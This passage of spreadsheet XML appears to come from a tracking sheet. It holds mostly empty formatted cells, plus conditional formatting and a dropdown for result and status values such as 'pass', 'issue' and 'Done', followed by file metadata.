      <c r="J911" s="2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customHeight="1">
      <c r="A912" s="19"/>
      <c r="B912" s="20"/>
      <c r="C912" s="21"/>
      <c r="D912" s="21"/>
      <c r="E912" s="19"/>
      <c r="F912" s="19"/>
      <c r="G912" s="19"/>
      <c r="H912" s="22"/>
      <c r="I912" s="22"/>
      <c r="J912" s="2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customHeight="1">
      <c r="A913" s="19"/>
      <c r="B913" s="20"/>
      <c r="C913" s="21"/>
      <c r="D913" s="21"/>
      <c r="E913" s="19"/>
      <c r="F913" s="19"/>
      <c r="G913" s="19"/>
      <c r="H913" s="22"/>
      <c r="I913" s="22"/>
      <c r="J913" s="2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customHeight="1">
      <c r="A914" s="19"/>
      <c r="B914" s="20"/>
      <c r="C914" s="21"/>
      <c r="D914" s="21"/>
      <c r="E914" s="19"/>
      <c r="F914" s="19"/>
      <c r="G914" s="19"/>
      <c r="H914" s="22"/>
      <c r="I914" s="22"/>
      <c r="J914" s="2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customHeight="1">
      <c r="A915" s="19"/>
      <c r="B915" s="20"/>
      <c r="C915" s="21"/>
      <c r="D915" s="21"/>
      <c r="E915" s="19"/>
      <c r="F915" s="19"/>
      <c r="G915" s="19"/>
      <c r="H915" s="22"/>
      <c r="I915" s="22"/>
      <c r="J915" s="2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customHeight="1">
      <c r="A916" s="19"/>
      <c r="B916" s="20"/>
      <c r="C916" s="21"/>
      <c r="D916" s="21"/>
      <c r="E916" s="19"/>
      <c r="F916" s="19"/>
      <c r="G916" s="19"/>
      <c r="H916" s="22"/>
      <c r="I916" s="22"/>
      <c r="J916" s="2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customHeight="1">
      <c r="A917" s="19"/>
      <c r="B917" s="20"/>
      <c r="C917" s="21"/>
      <c r="D917" s="21"/>
      <c r="E917" s="19"/>
      <c r="F917" s="19"/>
      <c r="G917" s="19"/>
      <c r="H917" s="22"/>
      <c r="I917" s="22"/>
      <c r="J917" s="2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customHeight="1">
      <c r="A918" s="19"/>
      <c r="B918" s="20"/>
      <c r="C918" s="21"/>
      <c r="D918" s="21"/>
      <c r="E918" s="19"/>
      <c r="F918" s="19"/>
      <c r="G918" s="19"/>
      <c r="H918" s="22"/>
      <c r="I918" s="22"/>
      <c r="J918" s="2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customHeight="1">
      <c r="A919" s="19"/>
      <c r="B919" s="20"/>
      <c r="C919" s="21"/>
      <c r="D919" s="21"/>
      <c r="E919" s="19"/>
      <c r="F919" s="19"/>
      <c r="G919" s="19"/>
      <c r="H919" s="22"/>
      <c r="I919" s="22"/>
      <c r="J919" s="2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customHeight="1">
      <c r="A920" s="19"/>
      <c r="B920" s="20"/>
      <c r="C920" s="21"/>
      <c r="D920" s="21"/>
      <c r="E920" s="19"/>
      <c r="F920" s="19"/>
      <c r="G920" s="19"/>
      <c r="H920" s="22"/>
      <c r="I920" s="22"/>
      <c r="J920" s="2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customHeight="1">
      <c r="A921" s="19"/>
      <c r="B921" s="20"/>
      <c r="C921" s="21"/>
      <c r="D921" s="21"/>
      <c r="E921" s="19"/>
      <c r="F921" s="19"/>
      <c r="G921" s="19"/>
      <c r="H921" s="22"/>
      <c r="I921" s="22"/>
      <c r="J921" s="2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customHeight="1">
      <c r="A922" s="19"/>
      <c r="B922" s="20"/>
      <c r="C922" s="21"/>
      <c r="D922" s="21"/>
      <c r="E922" s="19"/>
      <c r="F922" s="19"/>
      <c r="G922" s="19"/>
      <c r="H922" s="22"/>
      <c r="I922" s="22"/>
      <c r="J922" s="2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customHeight="1">
      <c r="A923" s="19"/>
      <c r="B923" s="20"/>
      <c r="C923" s="21"/>
      <c r="D923" s="21"/>
      <c r="E923" s="19"/>
      <c r="F923" s="19"/>
      <c r="G923" s="19"/>
      <c r="H923" s="22"/>
      <c r="I923" s="22"/>
      <c r="J923" s="2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customHeight="1">
      <c r="A924" s="19"/>
      <c r="B924" s="20"/>
      <c r="C924" s="21"/>
      <c r="D924" s="21"/>
      <c r="E924" s="19"/>
      <c r="F924" s="19"/>
      <c r="G924" s="19"/>
      <c r="H924" s="22"/>
      <c r="I924" s="22"/>
      <c r="J924" s="2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customHeight="1">
      <c r="A925" s="19"/>
      <c r="B925" s="20"/>
      <c r="C925" s="21"/>
      <c r="D925" s="21"/>
      <c r="E925" s="19"/>
      <c r="F925" s="19"/>
      <c r="G925" s="19"/>
      <c r="H925" s="22"/>
      <c r="I925" s="22"/>
      <c r="J925" s="2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customHeight="1">
      <c r="A926" s="19"/>
      <c r="B926" s="20"/>
      <c r="C926" s="21"/>
      <c r="D926" s="21"/>
      <c r="E926" s="19"/>
      <c r="F926" s="19"/>
      <c r="G926" s="19"/>
      <c r="H926" s="22"/>
      <c r="I926" s="22"/>
      <c r="J926" s="2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customHeight="1">
      <c r="A927" s="19"/>
      <c r="B927" s="20"/>
      <c r="C927" s="21"/>
      <c r="D927" s="21"/>
      <c r="E927" s="19"/>
      <c r="F927" s="19"/>
      <c r="G927" s="19"/>
      <c r="H927" s="22"/>
      <c r="I927" s="22"/>
      <c r="J927" s="2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customHeight="1">
      <c r="A928" s="19"/>
      <c r="B928" s="20"/>
      <c r="C928" s="21"/>
      <c r="D928" s="21"/>
      <c r="E928" s="19"/>
      <c r="F928" s="19"/>
      <c r="G928" s="19"/>
      <c r="H928" s="22"/>
      <c r="I928" s="22"/>
      <c r="J928" s="2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customHeight="1">
      <c r="A929" s="19"/>
      <c r="B929" s="20"/>
      <c r="C929" s="21"/>
      <c r="D929" s="21"/>
      <c r="E929" s="19"/>
      <c r="F929" s="19"/>
      <c r="G929" s="19"/>
      <c r="H929" s="22"/>
      <c r="I929" s="22"/>
      <c r="J929" s="2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customHeight="1">
      <c r="A930" s="19"/>
      <c r="B930" s="20"/>
      <c r="C930" s="21"/>
      <c r="D930" s="21"/>
      <c r="E930" s="19"/>
      <c r="F930" s="19"/>
      <c r="G930" s="19"/>
      <c r="H930" s="22"/>
      <c r="I930" s="22"/>
      <c r="J930" s="2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customHeight="1">
      <c r="A931" s="19"/>
      <c r="B931" s="20"/>
      <c r="C931" s="21"/>
      <c r="D931" s="21"/>
      <c r="E931" s="19"/>
      <c r="F931" s="19"/>
      <c r="G931" s="19"/>
      <c r="H931" s="22"/>
      <c r="I931" s="22"/>
      <c r="J931" s="2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customHeight="1">
      <c r="A932" s="19"/>
      <c r="B932" s="20"/>
      <c r="C932" s="21"/>
      <c r="D932" s="21"/>
      <c r="E932" s="19"/>
      <c r="F932" s="19"/>
      <c r="G932" s="19"/>
      <c r="H932" s="22"/>
      <c r="I932" s="22"/>
      <c r="J932" s="2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customHeight="1">
      <c r="A933" s="19"/>
      <c r="B933" s="20"/>
      <c r="C933" s="21"/>
      <c r="D933" s="21"/>
      <c r="E933" s="19"/>
      <c r="F933" s="19"/>
      <c r="G933" s="19"/>
      <c r="H933" s="22"/>
      <c r="I933" s="22"/>
      <c r="J933" s="2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2.75" customHeight="1">
      <c r="A934" s="19"/>
      <c r="B934" s="20"/>
      <c r="C934" s="21"/>
      <c r="D934" s="21"/>
      <c r="E934" s="19"/>
      <c r="F934" s="19"/>
      <c r="G934" s="19"/>
      <c r="H934" s="22"/>
      <c r="I934" s="22"/>
      <c r="J934" s="2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2.75" customHeight="1">
      <c r="A935" s="19"/>
      <c r="B935" s="20"/>
      <c r="C935" s="21"/>
      <c r="D935" s="21"/>
      <c r="E935" s="19"/>
      <c r="F935" s="19"/>
      <c r="G935" s="19"/>
      <c r="H935" s="22"/>
      <c r="I935" s="22"/>
      <c r="J935" s="2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2.75" customHeight="1">
      <c r="A936" s="19"/>
      <c r="B936" s="20"/>
      <c r="C936" s="21"/>
      <c r="D936" s="21"/>
      <c r="E936" s="19"/>
      <c r="F936" s="19"/>
      <c r="G936" s="19"/>
      <c r="H936" s="22"/>
      <c r="I936" s="22"/>
      <c r="J936" s="2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</sheetData>
  <autoFilter ref="A3:J7" xr:uid="{6DEC4E49-E866-DB47-BB4B-93098970F7F3}">
    <filterColumn colId="7" showButton="0"/>
  </autoFilter>
  <mergeCells count="11">
    <mergeCell ref="A1:J1"/>
    <mergeCell ref="A3:A4"/>
    <mergeCell ref="B3:B4"/>
    <mergeCell ref="C3:C4"/>
    <mergeCell ref="E3:E4"/>
    <mergeCell ref="H3:H4"/>
    <mergeCell ref="I3:I4"/>
    <mergeCell ref="J3:J4"/>
    <mergeCell ref="F3:F4"/>
    <mergeCell ref="D3:D4"/>
    <mergeCell ref="G3:G4"/>
  </mergeCells>
  <conditionalFormatting sqref="H5:H7">
    <cfRule type="cellIs" dxfId="119" priority="16" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H5:H7">
    <cfRule type="cellIs" dxfId="118" priority="17" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H5:H7">
    <cfRule type="cellIs" dxfId="117" priority="18" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H12:H15 I5:J7 I16:J936 I1:J2 I9:J11">
    <cfRule type="containsText" dxfId="116" priority="19" operator="containsText" text="Not started">
      <formula>NOT(ISERROR(SEARCH(("Not started"),(H1))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H12:H15 I5:J7 I16:J936 I1:J2 I9:J11">
    <cfRule type="containsText" dxfId="115" priority="20" operator="containsText" text="In progress">
      <formula>NOT(ISERROR(SEARCH(("In progress"),(H1))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H12:H15 I5:J7 I16:J936 I1:J2 I9:J11">
    <cfRule type="containsText" dxfId="114" priority="21" operator="containsText" text="Done">
      <formula>NOT(ISERROR(SEARCH(("Done"),(H1))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A13">
    <cfRule type="cellIs" dxfId="113" priority="13" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A13">
    <cfRule type="cellIs" dxfId="112" priority="14" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A13">
    <cfRule type="cellIs" dxfId="111" priority="15" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A14">
    <cfRule type="cellIs" dxfId="110" priority="10" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A14">
    <cfRule type="cellIs" dxfId="109" priority="11" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A14">
    <cfRule type="cellIs" dxfId="108" priority="12" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A15">
    <cfRule type="cellIs" dxfId="107" priority="7" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A15">
    <cfRule type="cellIs" dxfId="106" priority="8" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A15">
    <cfRule type="cellIs" dxfId="105" priority="9" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H8">
    <cfRule type="cellIs" dxfId="104" priority="1" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H8">
    <cfRule type="cellIs" dxfId="103" priority="2" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H8">
    <cfRule type="cellIs" dxfId="102" priority="3" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I8:J8">
    <cfRule type="containsText" dxfId="101" priority="4" operator="containsText" text="Not started">
      <formula>NOT(ISERROR(SEARCH(("Not started"),(I8))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I8:J8">
    <cfRule type="containsText" dxfId="100" priority="5" operator="containsText" text="In progress">
      <formula>NOT(ISERROR(SEARCH(("In progress"),(I8))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I8:J8">
    <cfRule type="containsText" dxfId="99" priority="6" operator="containsText" text="Done">
      <formula>NOT(ISERROR(SEARCH(("Done"),(I8))))</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="1">
    <dataValidation type="list" allowBlank="1" showInputMessage="1" prompt="result" sqref="H5:H8" xr:uid="{933B1DAC-5BCA-324F-944C-F200826FEA69}">
      <formula1>$A$13:$A$15</formula1>
    </dataValidation>
  </dataValidations>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0" footer="0"/>
  <pageSetup orientation="portrait"/>
  <ignoredErrors>
    <ignoredError sqref="A5:A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Prathan Phongthiproek</cp:lastModifiedBy>
  <cp:revision/>
  <dcterms:created xsi:type="dcterms:W3CDTF">1996-10-14T23:33:28Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-02-06T09:53:21Z</dcterms:modified>
  <cp:category/>
  <cp:contentStatus/>
</cp:coreProperties>
</file>